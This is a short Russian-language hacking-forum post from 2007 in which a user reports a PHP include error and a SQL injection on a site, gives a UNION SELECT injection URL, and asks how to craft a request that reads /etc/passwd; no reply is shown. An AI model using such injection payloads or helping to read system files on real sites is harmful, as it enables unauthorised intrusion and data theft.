11.12.2007, 21:58
|
|
Участник форума
Регистрация: 14.08.2007
Сообщений: 150
С нами:
9865044
Репутация:
205
|
|
SQL + PHP injection ?
У меня вопрос. Попалась такая ошибочка:
Warning: main(): Failed opening '4' for inclusion (include_path='.:/usr/share/php:/usr/share/pear') in /bla/www/site.com/main.php on line 290
Это PHP инклюд, да? Как составить запрос, чтобы прочитать /etc/passwd? SQL-INJECTION у меня такая:
Код HTML:
http://www.site.com/main.php?id=1+UNION+SELECT+1,2,3,4,5,6,7/*
|
|
|